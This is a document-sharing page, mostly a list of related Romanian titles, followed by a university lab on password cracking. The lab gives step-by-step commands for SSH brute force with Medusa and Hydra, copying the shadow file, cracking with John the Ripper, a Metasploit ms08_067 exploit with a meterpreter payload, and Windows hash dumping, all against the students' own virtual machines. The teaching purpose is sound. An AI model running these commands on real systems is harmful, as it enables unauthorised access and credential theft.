Laborator5- ASR

Documente similare
Laborator2 - ASR

Microsoft Word - cap2.2.UNIX-NOS.doc

RainbowCrack Rodocea Madalina Grupa Martie 2016

AcadNet Etapa Naţională Secțiunea calculatoare, clasele Citiți cu atenție toate subiectele înainte de a începe rezolvarea. Aveți 15 minut

1. Depistarea setarilor de retea necesare Primul pas pentru introducerea in retea a DVR-ului este determinarea setarilor de retea cu care lucreaza ret

Example Title with Registration Microsoft® and Trademark SQL ServerTM

Biomedical Wi-Fi data transmissons

Laborator - Configurarea Rutelor IPv4 Statice și Implicite Topologie Tabela de Adresare Echipame nt Interfață Adresă IP Masca de subreţea Default Gate

Modulul 1 M1-2.3 Protocoale şi servicii în reţea În acest capitol ne propunem să abordăm următoarele: Protocoalele şi aplicaţiile folosite în reţelele

Facultatea de Științe Politice, Administrative și ale Comunicării Str. Traian Moșoiu nr. 71 Cluj-Napoca, RO Tel.: Fax:

Laborator Depanarea Rutării Inter-VLAN Topologie 2013 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 1 of 8

COLEGIUL TEHNIC „VICTOR UNGUREANU” CAMPIA TURZII

Utilizarea Internetului in Afaceri FSEGA, UBB Lect.univ.dr. Daniel Mican LABORATOR 3. Achizitionarea domeniilor web si a

PHP (II)

Colegiul Economic Administrativ - Iasi

Packet Tracer - Configurarea ACL-urilor extinse - Scenariul 1 Topologie Tabela de Adresare R1 Echipament Interfață Adresă IP Masca de subreţea Default

(Microsoft PowerPoint SIBIUEVIDENTA [Doar \356n citire])

Instrucţiuni Conectare Internet Banking Prima conectare (logare) la Internet Banking (aplicaţia BankFlex Multychannel) Pentru a accesa serviciile banc

Laborator - Depanarea configurării și plasării ACL-ului. Topologie 2013 Cisco and/or its affiliates. All rights reserved. This document is Cisco Publi

Microsoft Word - lab-fr_3

Laborator - Configurarea de bază DHCPv4 pe un router Topologie Tabela de Adresare Echipame nt Interfață Adresă IP Masca de subreţea Default Gateway Ob

PowerPoint Presentation

Linux – Administrare Sistem

Microsoft Word - Plus TV Analog Pro Stick Installation _Rom V1.3_.doc

Informație și comunicare

CABINET MINISTRU

Laborator - Proiectarea și Implementarea Adresării cu VLSM Topologie Obiective Partea 1: Examinați Cerințele Rețelei Partea 2: Proiectați Schema Adres

AdVision este un software de narrowcasting, destinat tuturor celor care administrează conţinut pe o reţea de monitoare. Fie că este vo

Înregistrator de temperatură şi umiditate AX-DT100 Instrucţiuni de utilizare

Laborator - Configurarea Setărilor de Bază ale Router-ului cu CCP Topologie Tabela de Adresare Echipament Interfață Adresă IP Masca de subreţea Defaul

Ghid de utilizare pentru Platforma E-Admitere intranet.inj.md

Echipamente de tip Glitel Identificarea Model-ului și Hardware version al echipamentului: Deschidem web browserul (Internet Explorer, Opera, Mozila, G

Microsoft Word - Politică de cookie-uri OK_v1.docx

Laborator02

Transmisia datelor multimedia in retele de calculatoare <Titlu Lucrare>

Microsoft Word Sony_Ericsson_RO.doc

Atributii:

Reţele de calculatoare

HONEYWELL AWARD

Laborator - Configurarea NAT-ului Dinamic și Static Topologie Tabela de Adresare Echipament Interfață Adresă IP Masca de subreţea Default Gateway Obie

Discipline aferente competenţelor Facultate: Facultatea de Electronică şi Telecomunicaţii Universitate: UNIVERSITATEA POLITEHNICA DIN TIMIȘOARA Domeni

Testul l.1 Numele si prenumele Durata evaluării Timp de lucru: 30 minute Exerciţiul 1 Enunţ: Pentru fiecare item bifaţi răspunsurile corecte. 1.1 Ce v

Comparație versiuni AOMEI Backupper 1 Care versiune este cea mai potrivită pentru dvs.? AOMEI Backupper este disponibil în prezent în patru ediții dif

Microsoft Word - Ansamblul software CRONIS

Testare manuala: situatia in care o persoana initiaza fiecare test, interactioneaza cu el si interpreteaza, analizeaza si raporteaza rezultatele. Test

Schliesszylinder_RO_SK_HR.indd

QUICK START GUIDE

CAIET DE SARCINI


R E G U L A M E N T U L privind utilizarea Sistemului Informațional Automatizat Acreditare (SIA Acreditare) în cadrul Centrului Național de Acreditare

CASA CORPULUI DIDACTIC BRAILA PROGRAM DE FORMARE INFORMATICA SI TIC PENTRU GIMNAZIU CLASA A V-A SERIA 1 GRUPA 2 CURSANT: TIMOFTI V. AFRODITA COLEGIUL

Информационная система персонализации, печати и учета документов об образовании

Ghid de instalare ebook Pentru a accesa ebook-ul trebuie să creați un cont pe raftul de cărți VitalSource (Bookshelf account) iar apoi să introduceți

Ghid Web connect DCP-J4120DW MFC-J4420DW MFC-J4620DW MFC-J5320DW MFC-J5620DW MFC-J5720DW

Microsoft Word - MI_05_009_Prescriere_1.doc

Lifehack for router protection and network

e-learning Agronomie Platforma de e-learning Versiunea: Ghid de utilizare Beneficiar: UNIVERSITATEA DE STIINTE AGRONOMICE SI MEDICINA VETERINARA

Curs 10 - Automatizarea scalabila a sistemelor

1. Operatii cu matrici 1 Cerinte: Sa se realizeze functii pentru operatii cu matrici patratice (de dimensiune maxima 10x10). Operatiile cerute sunt: A

Microsoft Word - L63 FPGA.doc

SSA07r [Compatibility Mode]

Fâciu N. Maria-Ema CASA CORPULUI DIDACTIC BRĂILA PROGRAM DE FORMARE INFORMATICĂ ȘI TIC PENTRU GIMNAZIU CLASA A V-A SERIA 1 GRUPA 2 CURSANT: Fâciu N. M


INFORMATICĂ ŞI MARKETING

Unitatea: Școala Gimnazială Disciplina: Informatică și TIC Programa școlară aprobată cu OMEN nr.3393 din Profesor: prof. Clasa: a V-a A, B

Capitole Speciale de Informatică Curs 4: Calculul scorurilor în un sistem complet de extragere a informaţiilor 18 octombrie 2018 Reamintim că în cursu

EVALEDIT - EDITOR ON-LINE DE TESTE GRILA Cristea BOBOILĂ * EvalEdit reprezintă o aplicaţie tip Internet al cărei scop este evaluarea on-line şi editar

Cursul 10 - Shell scripting

Cursul 10 - Shell scripting

Sisteme de calcul în timp real

EXCEL FĂRĂ SECRETE Grafice şi diagrame

Cursul 7 - Servicii de retea

Laborator 5 - Paradigme de Programare

Manual de utilizare a Sistemului Informațional al Institutului Național al Justiției (SI INJ) intranet.inj.md Ver.2 Manual de utilizare a Sistemului I

PowerPoint Presentation

Ghid de conectare la web MFC-J825DW MFC-J835DW DCP-J925DW Versiunea 0 ROM

Secţiunea 5-6 avansaţi PROBLEMA 1 Concurs online de informatică Categoria PROGRAMARE 100 puncte NR Un număr natural nenul V care se plictisea singur,

Concepte de bază ale Tehnologiei Informației

UNIVERSITATEA VASILE ALECSANDRI DIN BACĂU MONITORIZAREA SISTEMULUI TUTORIAL ID, A ACTIVITĂȚILOR APLICATIVE IFR ȘI A CELOR DE COMUNICARE BIDIRECȚIONALĂ

Ghid utilizare aplicație PARKING BUCUREȘTI Aplicație PARKING BUCUREȘTI 1

3

Matematici aplicate științelor biologie Lab06 MV

Slide 1

Slide 1

REVISAL Versiunea: Data release: 15 martie 2016 IMPORTANT! Distribuţia curentă (v6.0.4) a aplicaţiei Revisal conţine nomenclatorul COR ISCO 08 î

Paradigme de Programare

DCS-2330L_A1_QIG_v1.00(EU).indd

Pornire rapidă Powerline 1200 Model PL1200

Example Title with Registration Microsoft® and Trademark SQL ServerTM

客厅电脑 酷影Q1000

Slide 1

2

Microsoft PowerPoint - 11_USO_curs_08.ppt [Compatibility Mode]

FONDUL SOCIAL EUROPEAN

CRIPTOSISTEME SIMETRICE I

Microsoft PowerPoint - ARI_R_c9-10_IP_part2 [Compatibility Mode]

Ghid de instalare Powerline 500, model XAVB5221

Laborator 1-Teoria probabilitatilor si statistica matematica Sef lucrari dr.mat. Daniel N.Pop Departamentul de calculatoare si inginerie electrica 1 P

Pentru afacerea dumneavoastră ModernBiz Glossary 2014 Microsoft Corporation. Toate drepturile rezervate.


Transcriere:

Universitatea Politehnica Bucuresti Facultatea de Automatica si Calculatoare Master Securitatea Retelelor Informatice Complexe Auditarea Securitatii Retelelor Laborator 5 Spargerea parolelor Adrian Furtună, Ph.D. adif2k8@gmail.com

Obiective Vom exersa diverse tehnici pentru spargerea parolelor in urmatoarele situatii: Atacuri online (incercari repetate de login) Atacuri offline (spargerea hash-urilor) Auditarea Securitatii Retelelor - Laborator 2

Configurarea laboratorului Vom folosi 2 masini virtuale: BackTrack5 atacator Debian5 victima (SSH server) Placa de retea in mod NAT Auditarea Securitatii Retelelor - Laborator 3

Atacuri online Incercari repetate de autentificare (login) la un serviciu expus in retea (ssh, http, vnc, ftp, etc) Viteza mica Este nevoie de o eficientizare a atacului (incercari cu probabilitate mai mare de reusita) Dictionare de parole + reguli Auditarea Securitatii Retelelor - Laborator 4

Dictionare de parole Parole default: http://www.phenoelit-us.org/dpl/dpl.html Liste standard de parole: http://www.skullsecurity.org/wiki/index.php/passwords Dictionar personalizat de parole: http://www.digininja.org/projects/cewl.php Auditarea Securitatii Retelelor - Laborator 5

Exercitiul 1 Aflati parola de SSH a utilizatorului dexter de pe masina victima (proprie) folosind o lista standard de parole (500-worst-passwords.txt). Tool: Medusa v2.0 http://www.foofus.net Sintaxa: medusa [-h host -H file] [-u username -U file] [-p password -P file] [-C file] -M module [OPT] Auditarea Securitatii Retelelor - Laborator 6

Sa construim o lista de parole Vom aplica un set de reguli pentru a creste complexitatea parolelor din dictionarul standard: Ex: password Password Password2010 Password! password123# PASSWORD2 etc Auditarea Securitatii Retelelor - Laborator 7

Meet John the Ripper Offline password cracker http://www.openwall.com/john/ Suporta numeroase formate de parole (cu jumbo patch): DES/MD5/LM/NT/raw-MD5/raw-sha1/md5a/hmac-md5/KRB5/oracle/oracle11/MYSQL/mysqlsha1/mscash/lotus5/NETLM/NETNTLM/NETLMv2/NETNTLMv2/NETHALFLM/mssql/mssql05/phps/crypt etc Determinarea vitezei de calcul pentru un anumit algoritm:./john --test --format=raw-md5 Cracking modes: Single mode: Wordlist mode: Wordlist + mangling rules:./john --single pwdfile.txt./john --wordlist=dictionar.txt pwdfile.txt./john --wordlist=dictionar.txt --rules=myrules pwdfile.txt Incremental mode:./john --incremental pwdfile.txt Fisiere importante pentru John: john.conf - contine toate optiunile de configurare john.pot - mentine parolele descoperite in format criptat john.rec - mentine informatii despre sesiunea curenta Alte comenzi utile:./john --show pwdfile.txt - afiseaza parolele descoperite pana in acest moment./john --restore - reia ultima sesiune de cracking de la ultima pozitie testata Auditarea Securitatii Retelelor - Laborator 8

Exercitiul 2 Aflati parola de SSH a utilizatorului topcat de pe masina victima (proprie) folosind un dictionar cu parole complexe. Vom folosi regulile implicite din fisierul john.conf pentru a crea parole complexe. Sintaxa: http://www.openwall.com/john/doc/rules.shtml./john --rules --wordlist=keywords.txt --stdout > newdict.txt Pornim atacul asupra serverului tinta: Tool: Hydra v5.4 http://www.thc.org Sintaxa: hydra [[[-l LOGIN -L FILE] [-p PASS -P FILE]] [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vv] server service [OPT] (-t 5 -V) Auditarea Securitatii Retelelor - Laborator 9

Atacuri offline asupra parolelor Necesita hash-ul parolei Algoritmul de hashing folosit Se recalculeaza hash-ul pentru diverse cuvinte (ex. din dictionar) si se compara cu hash-ul parolei Viteza mare Reusita atacului depinde de lungimea si complexitatea parolei cat si de puterea de calcul Forta bruta (toate combinatiile posibile) este eficienta pentru parole de pana la 7-8 caractere Folosirea procesoarelor grafice GPU ale placilor NVIDIA CUDA imbunatatesc timpul de calcul http://hashcat.net/oclhashcat/ http://www.elcomsoft.com/lhc.html Auditarea Securitatii Retelelor - Laborator 10

Exercitiul 3 Gasiti fisierul cu hash-urile parolelor utilizatorilor de pe sistemul victima (Debian) si transferati-l pe masina atacator (+ fisierul passwd). Hints: /etc, scp Auditarea Securitatii Retelelor - Laborator 11

Exercitiul 4 Obtineti parola utilizatorului root de pe sistemul victima (Debian) folosind fisierele obtinute anterior. 1. root@bt: john 2../unshadow pwdfile.txt shadowfile.txt > unshadow.txt 3../john unshadow.txt 4../john --show unshadow.txt Auditarea Securitatii Retelelor - Laborator 12

Reconfigurarea laboratorului Vom folosi 2 masini virtuale: BackTrack5 atacator Windows XP SP2 victima Placa de retea in mod NAT Auditarea Securitatii Retelelor - Laborator 13

Exercitiul 5 Obtineti acces in masina virtuala Windows exploatand vulnerabilitatea ms08-067. Folositi ca PAYLOAD windows/meterpreter/bind_tcp. http://www.offensive-security.com/metasploitunleashed/metasploit_meterpreter_basics 1. cd /pentest/exploits/framework3 2../msfconsole 3. use exploit/windows/smb/ms08_067_netapi 4. set RHOST 5. set TARGET 3 6. set PAYLOD windows/meterpreter/bind_tcp 7. exploit Auditarea Securitatii Retelelor - Laborator 14

Exercitiul 6 Extrageti hash-urile utilizatorilor definiti local in Windows (LMHASH, NTLMHASH) si copiati-le intr-un fisier text. Metode alternative: fgdump - http://www.foofus.net/~fizzgig/fgdump/ pwdump7 - http://www.tarasco.org/security/pwdump_7/ Auditarea Securitatii Retelelor - Laborator 15

Exercitiul 7 Folositi JohnTheRipper pentru a gasi parolele utilizatorilor locali. 1. Spargem hash-ul LM (parola case insensitive):./john --format=lm hashes.txt 2. Spargem hash-ul NTLM folosind hash-ul LM si parola recuperata anterior => parola case sensitive root@bt:/pentest/exploits/framework3/tools#./lm2ntcrack.rb Auditarea Securitatii Retelelor - Laborator 16

Rainbow Tables Compromis: spatiu de stocare timp de spargere a parolei Lista de hash-uri precalculate => spargerea parolei inseamna cautare (nu recalculare) Metoda nu este fezabila pentru algoritmi de hashing care au ca input mai multe variabile: Ex: MSCASH = MD4(MD4(password ) lowercase(username) ) Necesita spatiu foarte mare de stocare http://www.freerainbowtables.com/ http://sourceforge.net/projects/rcracki/ Auditarea Securitatii Retelelor - Laborator 17

Rainbow Tables - Online http://md5crack.com/ http://www.objectif-securite.ch/products.php http://cracker.offensive-security.com/ http://www.hash-cracker.com/ Exercitiu: Gasiti parola de Windows din hash-ul LM folosind site-ul www.objectif-securite.ch/products.php Auditarea Securitatii Retelelor - Laborator 18

Literatura si alte unelte http://tools.questiondefense.com/cracking_passwords_guide.pdf Cain Ophcrack Aircrack Brutus www.oxid.it/cain.html http://ophcrack.sourceforge.net/ http://www.aircrack-ng.org/ http://www.hoobie.net/brutus/ Auditarea Securitatii Retelelor - Laborator 19

Intrebari? Auditarea Securitatii Retelelor - Laborator 20